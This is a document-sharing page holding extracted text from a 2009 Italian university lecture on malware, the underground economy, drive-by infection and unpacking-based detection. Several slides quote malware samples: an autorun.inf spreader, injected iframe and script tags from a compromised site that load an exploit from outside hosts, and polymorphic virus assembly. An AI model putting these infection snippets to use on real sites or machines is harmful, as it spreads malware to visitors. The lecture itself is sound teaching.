Malware e underground economy

Documenti analoghi
Modulo informatica di base 1 Linea 2. Lezione XIII: Sicurezza informatica. Cos è la sicurezza informatica. C è davvero bisogno di parlarne?

Malware & Underground Economy

Sicurezza delle reti. Monga. Malware underground economy. Fast-flux service network. Risultati sperimentali. Sicurezza delle reti.

Sicurezza dei Calcolatori e delle Reti: Malware

Sicurezza delle reti. Monga. Malware underground economy. Fast-flux service network. Risultati sperimentali. Phishing. Sicurezza delle reti.

Sicurezza delle reti. Monga. Zero Day. polimorfismo. degli attacchi Tecniche di. Generatori di signature Hamsa. Malware underground economy

Malware. Roberto Paleari, Alessandro Rinaldi

Malware. Roberto Paleari, Emanuele Passerini

Università degli Studi di Milano. Malware. Aristide Fattori

Next generation malware

Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2008/2009. Malware

Malware 2.0. Alessandro Rozza Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali

Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali. Malware. Roberto Paleari <roberto@security.dico.unimi.

Evoluzione del malware

Nell oscuro mondo dei Malware

Seqrite Antivirus per Server

La sicurezza Malware Seconda parte. Giselda De Vita

Sicurezza delle reti. Monga. Fast-flux service network. Risultati sperimentali. L autenticazione. Botnet. Sicurezza delle reti. Monga.

MALWARE. 3/04/2010 Giuseppe Tamanini 1 di 22

Modulo informatica di base 1 Linea 2

ANALISI DÌ MALWARE E SOLUZIONI DÌ DIFESA. Tesina di Matteo Neri A.S

BOTNET: Il caso ZeuS. Theory and Practices from the Scene

Come affrontare le nuove minacce della Cybersecurity in Italia: Ransomware e Attacchi mirati. Fabio Sammartino Presales Manager Kaspersky Lab

INTERNET Ing. Giovanni Pozzi

Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali. Internet. Roberto Paleari <roberto@security.dico.unimi.

Tipologie e metodi di attacco

G Data Antivirus 2015

Banking Cybercrime: Attacchi e scenari di banking malware in Italia IEEE-DEST The OWASP Foundation. Giorgio Fedon Owasp Italy Technical Director

Informazioni sul Global Internet Security Threat Report di Symantec

EUROPEAN COMPUTER DRIVING LICENCE: IT SECURITY SPECIALISED LEVEL. Malware

SMAU Malicious Softwares: Conosciamoli meglio

Sommario Prefazione... xiii Diventa esperto in sicurezza... xiii Capitolo Codici nocivi... 1

Research Challenges in Computer Security Dipartimento di Informatica Università di Verona

INTERNET Ing. Giovanni Pozzi

Introduzione Virus Worm Anti-virus Bibliografia. Malware. Roberto Paleari

Attacchi alle infrastrutture virtuali

INDICE INTRODUZIONE E SCOPO DEL DOCUMENTO ORGANIZZAZIONE DEL DOCUMENTO. Introduzione e scopo del documento SICUREZZA... 8

Mobile Insecurity. Manno, 28 Settembre 2011 D Amato Luigi

LA SACRA BIBBIA: OSSIA L'ANTICO E IL NUOVO TESTAMENTO VERSIONE RIVEDUTA BY GIOVANNI LUZZI

ISTR XV: FOCUS SULLA SITUAZIONE ITALIANA E NUOVI TREND

Dati in locale e dati in cloud. Dati in cloud : Pro e Contro Principali Virus e Malware Piattaforme per condividere Dati

Microsoft Security Intelligence Report

NAVIGARE SICURI: LE TRAPPOLE DI INTERNET

Sicurezza delle reti. Monga. Polimorfismo degli attacchi. Generatori di signature Hamsa. Cifratura. Sicurezza delle reti. Monga.

Computer Viruses and the WiCE Simulation Environment

IT Security 2. I principali tipi di malware possono essere classificati in tre categorie:

Semplicemente più protetti. Consigli per gli utenti.

Software. 454 Firma digitale 456 Antivirus 458 Software gestionale. 0000_P _1.indd /04/

ANALISI DELLE BOTNET DI NUOVA GENERAZIONE BASATE SU PEER TO PEER E IMPLEMENTAZIONE IN AMBIENTE EMULATO

MALWARE. Cos è un Malware

Come proteggere la vostra rete corporate in modo progressivo ed integrato

Sicurezza Informatica

Quick Heal Total Security per Mac. Protezione facile, veloce e continuativa per Mac.

Virus di ieri e virus/malwaredi oggi quali pericoli per le aziende, gli enti e i professionisti

Creiamo un account da amministratore ed attiviamo le condivisioni amministrative della macchina in questione. FILE: CreateAdmin_EnableAutoShare.

Manutenzione del computer a livello software e tecniche di protezione anti malware Bologna - 26 novembre Elena Camerin

Connessioni sicure: ma quanto lo sono?

Tutta la famiglia dei processori Intel (x86) si basa ed e' compatibile con il primo processore di questo tipo: l'8086.

Avv. Giorgio Battaglini, Foro di Venezia Circolo dei Giuristi Telematici Camera Civile Veneziana

Avviso n. 85 Anagni, 26 gennaio 2016

Corso di Sistemi di Eleborazione Prof. N. Mazzocca

Content Security Spam e nuove minacce

Virus e minacce informatiche

Quick Heal AntiVirus Pro. Duro con il malware, leggero sul PC.

Introduzione a Internet e cenni di sicurezza. Dott. Paolo Righetto 1

Seqrite Antivirus per Server

Le nuove minacce - L'evoluzione del Malware e del Cybercrime Antonio Forzieri CISSP, CISA, CISM

La sicurezza: le minacce ai dati

MS WORD 2000 ULTIMA VULNERABILITA SCOPERTA

1 Concetti di base... 3

MIE1330 Supporto utenti e troubleshooting di client MS Windows 7 e MS Office 2007

UNO STUDIO SISTEMATICO DELLE INCONSISTENZE NEI NOMI DEI MALWARE

BitDefender Business Security

Esempi di intrusioni reali.. Esempi di intrusioni

Quick Heal AntiVirus Pro. Duro con il malware, leggero sul PC.

UNIVERSITÀ DEGLI STUDI DI TORINO

Software. 484 Firma digitale 485 Antivirus 487 PC Utility

La Sicurezza Online. Quando il rischio diventa un opportunità di business. Luigi Altavilla, Head of Antifraud Security Department, Global Operations

Corso di Sicurezza su Reti 2. Le Botnet

Come GUADAGNARE E GESTIRE BITCOIN (Italian Edition) By Alessandro Bersia;Giuseppe Silano

Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2011/2012. Rootkit.

Quick Heal Internet Security. Home Banking, Acquisti e Navigazione Online senza pensieri.

PTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato

I CAMBIAMENTI PROTOTESTO-METATESTO, UN MODELLO CON ESEMPI BASATI SULLA TRADUZIONE DELLA BIBBIA (ITALIAN EDITION) BY BRUNO OSIMO

LA SICUREZZA INFORMATICA SU INTERNET NOZIONI DI BASE SU INTERNET

Quali diritti per i bambini? RAGAZZI NELLA RETE. Navigazione sicura: strumenti e consigli

M ODULO 7 - SYLLABUS 1.0. IT Security. Corso NUOVA ECDL 2015 prof. A. Costa

La sicurezza informatica. Luca Filippi

Accesso sicuro, Trattamento Sicuro

Le tecnicheinformaticheper la sottrazionedidatiriservati

Windows XP e violazione norma sulla privacy

Padova18 feb09 Presentazione suite escan 10 SATA HTS - Microworld

NOTA: I prezzi disponibili non sono comprensivi di IVA né di costi di Setup* SERVIZI CLOUD. IntactMail Posta Sicura

Antonio Fini. Il Cloud a scuola. Antonio Fini

VIRUS: MYDOOM. Mydoom è un worm che si diffonde attraverso la posta elettronica in un messaggio con

Come capire se un sito web è INFETTO.

Norton AntiVirus 2009 con Antispyware Sicurezza intelligente, progettata per la velocità

ICSA Labs testa le Tecnologie TruPrevent TM

Il software. Il software. Dott. Cazzaniga Paolo. Dip. di Scienze Umane e Sociali paolo.cazzaniga@unibg.it

Assembly. Modello x86

Transcript:

Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2009/2010 Malware e underground economy Roberto Paleari roberto@security.dico.unimi.it 14 dicembre 2009 R. Paleari Malware e underground economy 14 dicembre 2009 1 / 41

Introduzione R. Paleari Malware e underground economy 14 dicembre 2009 2 / 41

Malware sequenza di codice progettata per danneggiare intenzionalmente un sistema, i dati che contiene o comunque alterare il suo normale funzionamento, all insaputa dell utente R. Paleari Malware e underground economy 14 dicembre 2009 3 / 41

Tipologie di malware replicazione no replicazione replicazione autonoma Virus Rootkit Trojan horse Worm Dialer Spyware Keylogger necessita ospite nessun ospite dipendenza da ospite R. Paleari Malware e underground economy 14 dicembre 2009 4 / 41

Tipologie di malware Virus & worm Virus Worm replicazione autonoma necessitano di un ospite in cui inserirsi propagazione attraverso la diffusione dell ospite non necessitano di un ospite propagazione autonoma attraverso la rete capacità di propagarsi in sistemi altrui sfruttando delle vulnerabilità R. Paleari Malware e underground economy 14 dicembre 2009 5 / 41

Tipologie di malware Virus & worm Virus replicazione autonoma necessitano di un ospite in cui inserirsi propagazione attraverso la diffusione dell ospite riproduzione Worm non necessitano di un ospite propagazione autonoma attraverso la rete capacità di propagarsi in sistemi altrui sfruttando delle vulnerabilità payload infezione R. Paleari Malware e underground economy 14 dicembre 2009 5 / 41

Tipologie di malware Trojan horse & backdoor Trojan horse funzionalità maligne cammuffate tra altre benigne propagazione manuale: diffusione di applicazioni con funzionalità secondarie o inserimento di nuove funzionalità in applicazioni esistenti rientrano in questa categoria adware e spyware R. Paleari Malware e underground economy 14 dicembre 2009 6 / 41

Tipologie di malware Trojan horse & backdoor Trojan horse Backdoor funzionalità maligne cammuffate tra altre benigne propagazione manuale: diffusione di applicazioni con funzionalità secondarie o inserimento di nuove funzionalità in applicazioni esistenti rientrano in questa categoria adware e spyware per assicurare l accesso ad un sistema compromesso rientrano in questa categoria i RAT (Remote Access Trojan) R. Paleari Malware e underground economy 14 dicembre 2009 6 / 41

Tipologie di malware Trojan horse & backdoor Trojan horse Backdoor Rootkit funzionalità maligne cammuffate tra altre benigne propagazione manuale: diffusione di applicazioni con funzionalità secondarie o inserimento di nuove funzionalità in applicazioni esistenti rientrano in questa categoria adware e spyware per assicurare l accesso ad un sistema compromesso rientrano in questa categoria i RAT (Remote Access Trojan) strumenti utilizzati per mantenere l accesso ad un sistema compromesso senza fare nascere sospetti utilizzati per nascondere file, processi, connessioni di rete,... sia a livello kernel che a livello utente R. Paleari Malware e underground economy 14 dicembre 2009 6 / 41

Nuove minacce 1800000 1600000 1400000 Number of new threats 1200000 1000000 800000 600000 400000 200000 0 Jan-Jun 2008 Jul-Dec 2007 Jan-Jun 2007 Jul-Dec 2008 Jan-Jun 2009 Period Fonte: Symantec R. Paleari Malware e underground economy 14 dicembre 2009 7 / 41

Malware & underground economy R. Paleari Malware e underground economy 14 dicembre 2009 8 / 41

Phishing R. Paleari Malware e underground economy 14 dicembre 2009 9 / 41

Phishing R. Paleari Malware e underground economy 14 dicembre 2009 9 / 41

Scam R. Paleari Malware e underground economy 14 dicembre 2009 10 / 41

Come funziona? 1 campagna di spam R. Paleari Malware e underground economy 14 dicembre 2009 11 / 41

Come funziona? 1 campagna di spam 2 social engineering GET /... R. Paleari Malware e underground economy 14 dicembre 2009 11 / 41

Come funziona? 1 campagna di spam 2 social engineering 3 furto credenziali & malware R. Paleari Malware e underground economy 14 dicembre 2009 11 / 41

Come funziona? 1 campagna di spam 2 social engineering 3 furto credenziali & malware 4 infezione macchine R. Paleari Malware e underground economy 14 dicembre 2009 11 / 41

Underground economy Vendita informazioni rubate Goods & services Percentage Range of prices Bank accounts 22% $10-$1000 Credit cards 13% $0.40-$20 Full identities 9% $1-$15 Online auction site accounts 7% $1-$8 Scams 7% $2.50-$50/week (hosting) Mailers 6% $1-$10 Email addresses 5% $0.83/MB-$10/MB Email passwords 5% $4-$30 Drop (request or offer) 5% 10%-20% of drop amount Proxies 5% $1.50-$30 Fonte: Symantec R. Paleari Malware e underground economy 14 dicembre 2009 12 / 41

Underground economy Furto credenziali Portata del fenomeno Università di Mannheim Limbo & ZeuS 70 dropzone 33 GB di dati 11000 account bancari, 150000 account mail Dropzone # Machines Data amount Country webpinkxxx.cn 26,150 1.5 GB China coxxx-google.cn 12,460 1.2 GB Malaysia 77.XXX.159.202 10,394 503 MB Russia finxxxonline.com 6,932 438 MB Estonia Other 108,122 24.4 GB Total 164,058 28.0 GB Fonte: Learning More About the Underground Economy T. Holz, M. Engelberth, F. Freiling, 2008 R. Paleari Malware e underground economy 14 dicembre 2009 13 / 41

Underground economy Malware as a service Bot in affitto ( $1000-$2000/mese) MPACK: exploit toolkit a $1000 R. Paleari Malware e underground economy 14 dicembre 2009 14 / 41

Underground economy The spam business CAPTCHA? OCR, Fuzzy OCR,... R. Paleari Malware e underground economy 14 dicembre 2009 15 / 41

Underground economy The spam business CAPTCHA? OCR, Fuzzy OCR,... Soluzioni migliori? R. Paleari Malware e underground economy 14 dicembre 2009 15 / 41

Underground economy The spam business CAPTCHA? OCR, Fuzzy OCR,... Soluzioni migliori? Human computation! > 100K captcha al giorno, $1.5-$8 per 1000 captcha R. Paleari Malware e underground economy 14 dicembre 2009 15 / 41

Underground economy The spam business CAPTCHA? OCR, Fuzzy OCR,... Soluzioni migliori? Human computation! R. Paleari Malware e underground economy 14 dicembre 2009 15 / 41

Funzionalità del malware Non solo spam... mass-mailing (Sobig) HTTP/SOCKS proxy (MyDoom) SMTP proxy (Taripox, Happy99) diffusione tramite IM (Peacomm) R. Paleari Malware e underground economy 14 dicembre 2009 16 / 41

Funzionalità del malware Furto credenziali Obiettivi credenziali account bancari/posta serial prodotti commerciali (Agobot) e-mail harvesting Come? installazione plugin BHO/XUL modifica C:\Windows\...\etc\hosts keylogging screen grabbing R. Paleari Malware e underground economy 14 dicembre 2009 17 / 41

Funzionalità del malware Click fraud Google: 10% dei click sono fraudolenti ( $1B) Clickbot.A ( 50k host infetti) molti clickbot commerciali ClickJacking R. Paleari Malware e underground economy 14 dicembre 2009 18 / 41

Funzionalità del malware Anti-anti-virus kill processi in esecuzione vari hook per auto-start prima dell AV impedire aggiornamento AV corruzione DB signature kernel-level callback via PsSetLoadImageNotifyRoutine()... R. Paleari Malware e underground economy 14 dicembre 2009 19 / 41

Funzionalità del malware Botnet... argomento della prossima lezione R. Paleari Malware e underground economy 14 dicembre 2009 20 / 41

Tecniche di infezione File/device infection file infection tecnicamente complesso con PE Virut EPO file infector entry programma infezione programma virus entry R. Paleari Malware e underground economy 14 dicembre 2009 21 / 41

Tecniche di infezione File/device infection file infection infezione device removibili Knight: autorun.inf [autorun] open=knight.exe open icon=knight.exe,0 shellexecute=knight.exe open shell=auto action=disk Knight(Protection Against Mobile Disk Viruses) shell\auto=&auto shell\auto\command=knight.exe open shell\open=&open shell\open\command=knight.exe open shell\explore=e&xplore shell\explore\command=knight.exe open shell\find=s&earch... shell\find\command=knight.exe open... R. Paleari Malware e underground economy 14 dicembre 2009 21 / 41

Tecniche di infezione File/device infection file infection infezione device removibili root-kit user vs kernel level obiettivo: nascondere processi, file, connessioni di rete,... hooking a diversi livelli (IDT,SSDT,DKOM,... ) Attacking SMM Memory via Intel CPU Cache Poisoning (19/3/2009) EPROCESS csrss.exe EPROCESS malware.exe EPROCESS svchost.exe R. Paleari Malware e underground economy 14 dicembre 2009 21 / 41

Tecniche di infezione File/device infection file infection infezione device removibili root-kit user vs kernel level obiettivo: nascondere processi, file, connessioni di rete,... hooking a diversi livelli (IDT,SSDT,DKOM,... ) Attacking SMM Memory via Intel CPU Cache Poisoning (19/3/2009) EPROCESS csrss.exe EPROCESS malware.exe EPROCESS svchost.exe R. Paleari Malware e underground economy 14 dicembre 2009 21 / 41

Tecniche di infezione File/device infection file infection infezione device removibili root-kit R. Paleari Malware e underground economy 14 dicembre 2009 21 / 41

Tecniche di infezione File/device infection file infection infezione device removibili root-kit MBR/boot infection Trojan.Mebroot (11/2007) infezione \\.\PhysicalDrive{0-15} ( compresi device USB) root-kit, furto credenziali bancarie This malware is very professionally written and produced (F-Secure) R. Paleari Malware e underground economy 14 dicembre 2009 21 / 41

Tecniche di propagazione Propagation mechanisms Percentage File sharing executables 40% File transfer/email attachment 32% File transfer/cifs 28% File sharing/p2p 19% Remotely exploitable vulnerability 17% SQL 3% Back door/kuang2 3% Back door/subseven 3% File transfer/embedded HTTP URI/Yahoo! Messenger 2% Web 1% Fonte: Symantec, 2007 R. Paleari Malware e underground economy 14 dicembre 2009 22 / 41

Tecniche di propagazione Rogue Antivirus R. Paleari Malware e underground economy 14 dicembre 2009 23 / 41

Tecniche di propagazione Rogue Antivirus R. Paleari Malware e underground economy 14 dicembre 2009 23 / 41

Tecniche di propagazione Rogue Antivirus R. Paleari Malware e underground economy 14 dicembre 2009 23 / 41

Tecniche di propagazione Remote exploit + drive-by-download R. Paleari Malware e underground economy 14 dicembre 2009 24 / 41

Tecniche di propagazione Remote exploit + drive-by-download R. Paleari Malware e underground economy 14 dicembre 2009 25 / 41

Tecniche di propagazione Remote exploit + drive-by-download Dolphin Stadium link a JS maligno nel sito exploit MS06-014 + MS07-004 download keylogger/backdoor 3 giorni prima del Super Bowl! R. Paleari Malware e underground economy 14 dicembre 2009 25 / 41

Tecniche di propagazione Remote exploit + drive-by-download R. Paleari Malware e underground economy 14 dicembre 2009 26 / 41

Tecniche di propagazione Remote exploit + drive-by-download parishilton.com <iframe> maligno download binario da you69tube.com information-stealing (variante di Zbot?) exploit PDF (overflow) If you screw around with Paris you might get a virus... Commento su ZDNet R. Paleari Malware e underground economy 14 dicembre 2009 26 / 41

Tecniche di propagazione Remote exploit + drive-by-download Un esempio live ricerca sito vulnerabile trend attuale: compromissione di siti famosi molti visitatori molte vittime R. Paleari Malware e underground economy 14 dicembre 2009 27 / 41

Tecniche di propagazione Remote exploit + drive-by-download Un esempio live ricerca sito vulnerabile trend attuale: compromissione di siti famosi molti visitatori molte vittime compromissione sito (SQLI) R. Paleari Malware e underground economy 14 dicembre 2009 27 / 41

Tecniche di propagazione Remote exploit + drive-by-download Un esempio live ricerca sito vulnerabile trend attuale: compromissione di siti famosi molti visitatori molte vittime compromissione sito (SQLI) R. Paleari Malware e underground economy 14 dicembre 2009 27 / 41

Tecniche di propagazione Remote exploit + drive-by-download Un esempio live ricerca sito vulnerabile trend attuale: compromissione di siti famosi molti visitatori molte vittime compromissione sito (SQLI) h.js document. w r i t e ( <i f r a m e s r c = h t t p : / /... / 0 5 0 0 admin /News/ f a q. htm ></i f r a m e> ) ; document. w r i t e ( <i f r a m e s r c = h t t p : / /... / i. htm ></i f r a m e> ) ; faq.htm <i f r a m e s r c=h t t p : / /... / i. htm width =100 h e i g h t=0></ i f r a m e> <s c r i p t s r c= h t t p : / / count49. 5 1 y e s. com/ c l i c k. aspx? i d =494953024& l o g o =11 ></ s c r i p t> i.htm <s c r i p t>... e x p l o i t...</ s c r i p t> <s c r i p t s r c= h t t p : / / count48. 5 1 y e s. com/ c l i c k. aspx? i d =480917198& l o g o=1 ></ s c r i p t> R. Paleari Malware e underground economy 14 dicembre 2009 27 / 41

Tecniche di propagazione Remote exploit + drive-by-download Un esempio live ricerca sito vulnerabile trend attuale: compromissione di siti famosi molti visitatori molte vittime compromissione sito (SQLI)... aspettare... R. Paleari Malware e underground economy 14 dicembre 2009 27 / 41

Soluzioni? R. Paleari Malware e underground economy 14 dicembre 2009 28 / 41

Soluzioni? R. Paleari Malware e underground economy 14 dicembre 2009 28 / 41

Situazione attuale malware vs AV AV in posizione svantaggiata The amount of new malware has never been higher. Our labs are receiving an average of 25,000 malware samples every day, seven days a week. F-Secure, 2008 R. Paleari Malware e underground economy 14 dicembre 2009 29 / 41

Perchè una cosí grande diffusione? omogeneità, connettività e configurazione R. Paleari Malware e underground economy 14 dicembre 2009 30 / 41

Perchè una cosí grande diffusione? omogeneità, connettività e configurazione scarsa attenzione R. Paleari Malware e underground economy 14 dicembre 2009 30 / 41

Perchè una cosí grande diffusione? omogeneità, connettività e configurazione scarsa attenzione incentivo economico R. Paleari Malware e underground economy 14 dicembre 2009 30 / 41

Situazione malware detector Signature-based detectors Fonte: Testing Malware Detectors M. Christodorescu, S. Jha, 2004 R. Paleari Malware e underground economy 14 dicembre 2009 31 / 41

Situazione malware detector... qualche dato più recente Rank Detected Missed Product 1 91% 178 Sophos 2 91% 179 AntiVir 3 90% 194 Microsoft 4 90% 195 AVG 5 90% 202 Ikarus 6 89% 213 BitDefender 7 88% 241 Norman 8 88% 247 TrendMicro 9 87% 259 Kaspersky 10 87% 268 F-Secure Fonte: SRI International + VirusTotal, campione di 2064 malware R. Paleari Malware e underground economy 14 dicembre 2009 32 / 41

Tecniche di self-defense Packing codice maligno nascosto da 1 + layer di compressione/cifratura decompressione/decrifratura a runtime R. Paleari Malware e underground economy 14 dicembre 2009 33 / 41

Tecniche di self-defense Packing codice maligno nascosto da 1 + layer di compressione/cifratura decompressione/decrifratura a runtime Malicious code R. Paleari Malware e underground economy 14 dicembre 2009 33 / 41

Tecniche di self-defense Packing codice maligno nascosto da 1 + layer di compressione/cifratura decompressione/decrifratura a runtime Unpacking routine Malicious code R. Paleari Malware e underground economy 14 dicembre 2009 33 / 41

Tecniche di self-defense Packing codice maligno nascosto da 1 + layer di compressione/cifratura decompressione/decrifratura a runtime Unpacking routine Unpacking routine Malicious code R. Paleari Malware e underground economy 14 dicembre 2009 33 / 41

Tecniche di self-defense Packing codice maligno nascosto da 1 + layer di compressione/cifratura decompressione/decrifratura a runtime Unpacking routine Unpacking routine Malicious code Problema 80% del malware è packed 200 famiglie di packer, 2000 varianti backlog di 90 famiglie Fonte: Symantec, 2008 R. Paleari Malware e underground economy 14 dicembre 2009 33 / 41

Tecniche di self-defense Polimorfismo Esempio ancora corpo cifrato il malware è in grado di mutare la routine di cifratura l e a s i, c o r p o v i r u s nop mov sp, 0682 h sub ax, bx c i c l o : xor [ s i ], s i inc cx xor [ s i ], sp i n c s i add bx, cx dec sp j n z c i c l o c o r p o v i r u s :... le istruzioni evidenziate sono junk code possibile anche instruction reordering, instruction substitution, register replacement,... elevato numero di mutazioni possibili difficile individuare una signature costante R. Paleari Malware e underground economy 14 dicembre 2009 34 / 41

Tecniche di self-defense Metamorfismo metamorphics are body-polymorphics (Igor Muttik) W95/Regswap 5A pop edx BF04000000 mov edi, 0004 h 8BF5 mov e s i, ebp B80C000000 mov eax, 0 0 0 Ch 81C288000000 add edx, 0088 h 8B1A mov ebx, [ edx ] 58 pop eax BB04000000 mov ebx, 0004 h 8BD5 mov edx, ebp BF0C000000 mov edi, 0 0 0 Ch 81C088000000 add eax, 0088 h 8B30 mov e s i, [ eax ] W32/Evol BF0F000055 mov edi,5500000 Fh 893E mov [ e s i ], e d i 5F pop e d i 52 push edx B640 mov dh, 4 0 BA8BEC5151 mov edx, 5 1 5 1 EC8Bh 53 push ebx 8BDA mov ebx, edx 895 E04 mov [ e s i +0004], ebx BB0F000055 mov ebx,5500000 Fh 891E mov [ e s i ], ebx 5B pop ebx 51 push ecx B9CB00C05F mov ecx, 5 FC000CBh 81C1C0EB91F1 add ecx, F191EBC0h 894 E04 mov [ e s i +0004], ecx R. Paleari Malware e underground economy 14 dicembre 2009 35 / 41

Tecniche di self-defense Implementazione difficile? R. Paleari Malware e underground economy 14 dicembre 2009 36 / 41

Tecniche di self-defense Implementazione difficile? R. Paleari Malware e underground economy 14 dicembre 2009 36 / 41

Next-generation malware detector Situazione attuale: Algorithmic unpacking Malicious program Malware detector R. Paleari Malware e underground economy 14 dicembre 2009 37 / 41

Next-generation malware detector Situazione attuale: Algorithmic unpacking Malware detector Malicious program???? R. Paleari Malware e underground economy 14 dicembre 2009 37 / 41

Next-generation malware detector Situazione attuale: Algorithmic unpacking Malware detector Malicious program???????? R. Paleari Malware e underground economy 14 dicembre 2009 37 / 41

Next-generation malware detector Situazione attuale: Algorithmic unpacking Malware detector Malicious program???????? Malicious R. Paleari Malware e underground economy 14 dicembre 2009 37 / 41

Next-generation malware detector Situazione attuale: Algorithmic unpacking Malware detector Malicious program???????? Malicious Problemi ogni packer richiede un unpacker specifico troppe famiglie di packer Symantec: da 6 ore a 6 mesi per packer multi-layer packing R. Paleari Malware e underground economy 14 dicembre 2009 37 / 41

Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking R. Paleari Malware e underground economy 14 dicembre 2009 38 / 41

Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking Packed code R. Paleari Malware e underground economy 14 dicembre 2009 38 / 41

Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking Packed code R. Paleari Malware e underground economy 14 dicembre 2009 38 / 41

Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking Packed code R. Paleari Malware e underground economy 14 dicembre 2009 38 / 41

Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking Packed code R. Paleari Malware e underground economy 14 dicembre 2009 38 / 41

Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking Unpacked Packed code Un po di nomi... OmniUnpack Justin Renovo PolyUnpack R. Paleari Malware e underground economy 14 dicembre 2009 38 / 41

Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX 0 1 2... R. Paleari Malware e underground economy 14 dicembre 2009 39 / 41

Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX 0 1 2... Esecuzione pagina 0 R. Paleari Malware e underground economy 14 dicembre 2009 39 / 41

Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX 0 1 2... Scrittura pagina 2 W = W {2} R. Paleari Malware e underground economy 14 dicembre 2009 39 / 41

Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... s 0 = NtOpenFile Page Access # W WX 0 1 2... Esecuzione system call s 0 (non pericolosa e WX = ) R. Paleari Malware e underground economy 14 dicembre 2009 39 / 41

Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX 0 1 2... Scrittura pagina 1 W = W {1} R. Paleari Malware e underground economy 14 dicembre 2009 39 / 41

Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX 0 1 2... Esecuzione pagina 1 WX = WX {1} (pagine written-then-executed) R. Paleari Malware e underground economy 14 dicembre 2009 39 / 41

Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... s 1 = NtOpenKey Page Access # W WX 0 1 2... Esecuzione system call s 1 (non pericolosa) R. Paleari Malware e underground economy 14 dicembre 2009 39 / 41

Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX 0 1 2... Esecuzione pagina 2 WX = WX {1} R. Paleari Malware e underground economy 14 dicembre 2009 39 / 41

Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... s 2 = NtDeleteFile Page Access # W WX 0 1 2... Esecuzione system call s 2 (pericolosa) Viene invocato il malware detector per analizzare le pagine in W R. Paleari Malware e underground economy 14 dicembre 2009 39 / 41

Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX 0 1 2... Se il programma non è maligno, W e WX diventano e l esecuzione riprende R. Paleari Malware e underground economy 14 dicembre 2009 39 / 41

Next-generation malware detector Analisi comportamentale signature-based detection è troppo debole verso tecniche più semantiche R. Paleari Malware e underground economy 14 dicembre 2009 40 / 41

Next-generation malware detector Analisi comportamentale signature-based detection è troppo debole verso tecniche più semantiche Soluzioni analisi dinamica granularità a livello di system call NovaShield, ThreatFire, Sana Security,... Problemi performance falsi positivi information leakage... R. Paleari Malware e underground economy 14 dicembre 2009 40 / 41

Remediation detection non è sempre possibile remediation dell infezione... ma funziona? R. Paleari Malware e underground economy 14 dicembre 2009 41 / 41

Remediation detection non è sempre possibile remediation dell infezione... ma funziona? R. Paleari Malware e underground economy 14 dicembre 2009 41 / 41